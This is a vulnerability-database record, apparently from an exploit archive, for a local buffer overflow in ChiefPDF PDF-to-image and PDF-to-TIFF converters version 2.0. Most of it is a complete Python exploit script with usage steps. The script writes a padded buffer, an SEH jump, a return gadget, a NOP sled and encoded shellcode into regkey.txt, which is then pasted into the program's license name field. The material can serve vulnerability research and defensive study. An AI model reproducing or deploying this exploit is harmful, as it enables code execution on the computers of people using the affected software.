Description
Multiple ChiefPDF Software 2.0 - Local Buffer Overflow
{"id": "EXPLOITPACK:B6E5A09150F7FEDB8005E9DE3AD66880", "vendorId": null, "type": "exploitpack", "bulletinFamily": "exploit", "title": "Multiple ChiefPDF Software 2.0 - Local Buffer Overflow", "description": "\nMultiple ChiefPDF Software 2.0 - Local Buffer Overflow", "published": "2015-08-20T00:00:00", "modified": "2015-08-20T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "", "reporter": "metacom", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2020-04-01T19:04:35", "viewCount": 4, "enchantments": {"dependencies": {}, "score": {"value": 0.4, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.4}, "_state": {"dependencies": 1678960192, "score": 1678962848, "epss": 1678962479}, "_internal": {"score_hash": "ef696a974b6c8ba7b2d21be5f1b0bd49"}, "sourceData": "#!/usr/bin/python\n#Exploit Title:ChiefPDF Software Buffer Overflow \n#vulnerable programs:\n#PDF to Image Converter 2.0\n#PDF to Image Converter Free 2.0\n#PDF to Tiff Converter 2.0\n#PDF to Tiff Converter Free 2.0\n#Software Link:http://www.soft32.com/publishers/chiefpdf/\n#Author: metacom - twitter.com/m3tac0m\n#Tested on: Win-Xp-sp3, Win-7, Win-8.1\n\n#How to use:Copy the AAAA...string from regkey.txt and paste->Registration - License Name: \nbuffer=\"A\" * 544\nbuffer+=\"\\xeb\\x06\\x90\\x90\"\nbuffer+=\"\\x8B\\x89\\x03\\x10\"# 1003898B 5E POP ESI \nbuffer+=\"\\x90\" * 80\nbuffer+=(\"\\xba\\x50\\x3e\\xf5\\xa5\\xda\\xd7\\xd9\\x74\\x24\\xf4\\x5b\\x31\\xc9\\xb1\"\n\"\\x33\\x83\\xc3\\x04\\x31\\x53\\x0e\\x03\\x03\\x30\\x17\\x50\\x5f\\xa4\\x5e\"\n\"\\x9b\\x9f\\x35\\x01\\x15\\x7a\\x04\\x13\\x41\\x0f\\x35\\xa3\\x01\\x5d\\xb6\"\n\"\\x48\\x47\\x75\\x4d\\x3c\\x40\\x7a\\xe6\\x8b\\xb6\\xb5\\xf7\\x3d\\x77\\x19\"\n\"\\x3b\\x5f\\x0b\\x63\\x68\\xbf\\x32\\xac\\x7d\\xbe\\x73\\xd0\\x8e\\x92\\x2c\"\n\"\\x9f\\x3d\\x03\\x58\\xdd\\xfd\\x22\\x8e\\x6a\\xbd\\x5c\\xab\\xac\\x4a\\xd7\"\n\"\\xb2\\xfc\\xe3\\x6c\\xfc\\xe4\\x88\\x2b\\xdd\\x15\\x5c\\x28\\x21\\x5c\\xe9\"\n\"\\x9b\\xd1\\x5f\\x3b\\xd2\\x1a\\x6e\\x03\\xb9\\x24\\x5f\\x8e\\xc3\\x61\\x67\"\n\"\\x71\\xb6\\x99\\x94\\x0c\\xc1\\x59\\xe7\\xca\\x44\\x7c\\x4f\\x98\\xff\\xa4\"\n\"\\x6e\\x4d\\x99\\x2f\\x7c\\x3a\\xed\\x68\\x60\\xbd\\x22\\x03\\x9c\\x36\\xc5\"\n\"\\xc4\\x15\\x0c\\xe2\\xc0\\x7e\\xd6\\x8b\\x51\\xda\\xb9\\xb4\\x82\\x82\\x66\"\n\"\\x11\\xc8\\x20\\x72\\x23\\x93\\x2e\\x85\\xa1\\xa9\\x17\\x85\\xb9\\xb1\\x37\"\n\"\\xee\\x88\\x3a\\xd8\\x69\\x15\\xe9\\x9d\\x86\\x5f\\xb0\\xb7\\x0e\\x06\\x20\"\n\"\\x8a\\x52\\xb9\\x9e\\xc8\\x6a\\x3a\\x2b\\xb0\\x88\\x22\\x5e\\xb5\\xd5\\xe4\"\n\"\\xb2\\xc7\\x46\\x81\\xb4\\x74\\x66\\x80\\xd6\\x1b\\xf4\\x48\\x37\\xbe\\x7c\"\n\"\\xea\\x47\")\nfile = open('regkey.txt','wb')\nfile.write(buffer);\nfile.close()", "affectedSoftware": [], "appercut": {}, "exploitpack": {"type": "local", "platform": "windows"}, "hackapp": {}, "toolHref": "", "w3af": {}}
{}